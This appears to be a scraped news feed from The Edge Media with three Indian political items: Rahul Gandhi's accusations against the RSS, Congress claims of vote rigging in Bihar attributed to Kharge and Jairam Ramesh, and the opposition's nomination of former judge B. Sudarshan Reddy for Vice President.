The post Rahul Gandhi Accuses RSS of Attempting to Influence India’s Institutions appeared first on The Edge Media.
]]>Gandhi said that following Mahatma Gandhi’s assassination, the RSS pursued what he described as a long-term goal of gaining control over India’s institutional framework, arguing that the current political atmosphere reflects the results of that sustained effort.
He further contended that the organisation does not support the principle of equality, insisting that its ideology is rooted in hierarchy rather than fairness. According to him, the belief that every Indian is equal “unsettles” those aligned with the RSS.
Emphasising the foundation of Indian democracy, Gandhi said the strength of the nation lies in the equal value of each citizen’s vote. He added that India, with its population of 1.5 billion people, is held together by the democratic right to vote, and he warned that any move to weaken electoral integrity threatens the country’s unity.

]]>The post Congress Claims Bihar Election Outcome Was Manipulated on a Massive Scale appeared first on The Edge Media.
]]>Congress president Mallikarjun Kharge stated that although the party respects the verdict of the people of Bihar, it will persist in resisting forces that, according to him, weaken democratic institutions through the misuse of constitutional bodies.
He noted that the party will thoroughly review the Bihar results and offer a comprehensive explanation after examining the factors that influenced the outcome. Kharge expressed deep gratitude to voters who supported the mahagathbandhan and encouraged Congress workers to remain motivated, calling them the party’s strength and pride.
Kharge reaffirmed that the Congress will intensify efforts to raise public awareness and remain committed to protecting the Constitution and democratic values He emphasized that the struggle is long but, will be pursued with dedication, courage, and honesty.
Congress communication in-charge Jairam Ramesh echoed these claims, stating that the Bihar verdict clearly reflects massive vote rigging and accusing the top leadership of the central government, the Election Commission of enabling it. He added that the party will strengthen its campaign to safeguard democracy and uphold constitutional principles.

]]>The post Former Supreme Court Judge B. Sudarshan Reddy Named Opposition’s Vice Presidential Candidate appeared first on The Edge Media.
]]>Kharge described the upcoming Vice Presidential election as more than a political contest, calling it “an ideological battle to safeguard democracy and the Constitution.” He stressed that the decision was taken with full consensus among all INDIA bloc parties. “I am happy that all Opposition parties agreed on one name. This is a major achievement for democracy. Whenever there is an attack on democracy or the Constitution, the Opposition will unite and fight back,” Kharge said.
Who is B. Sudarshan Reddy?
Justice Reddy is a distinguished former judge of the Supreme Court of India and also served as the first Lokayukta of Goa. He is currently a trustee board member of the International Arbitration and Mediation Centre, Hyderabad. Widely respected for his integrity and judicial acumen, he retired from the Supreme Court on 21 August 2011.
Opposition’s Strategy
By fielding Reddy, the INDIA bloc aims to strengthen its moral and constitutional appeal ahead of the polls. Opposition leaders see his candidature as a symbolic fight against what they term the erosion of democratic values in recent years. Kharge underlined that this election would send a message that the Opposition remains united: “This is not just about choosing a Vice President, but about protecting the spirit of democracy. That is why we decided to bring such a strong and credible candidate into the field.”
